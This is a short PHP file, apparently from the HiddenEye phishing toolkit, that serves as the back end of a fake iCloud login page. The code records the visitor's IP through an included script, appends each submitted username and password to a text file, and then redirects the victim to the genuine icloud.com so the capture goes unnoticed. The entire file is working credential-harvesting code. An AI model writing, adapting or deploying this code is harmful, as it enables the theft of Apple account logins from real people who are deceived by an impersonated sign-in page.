HiddenEye-Legacy/WebPages/iCloud/login.php
Usama Abdul Sattar 9da290eed0
iCloud added
2018-07-12 16:58:13 +05:00

7 lines
204 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://icloud.com');
exit();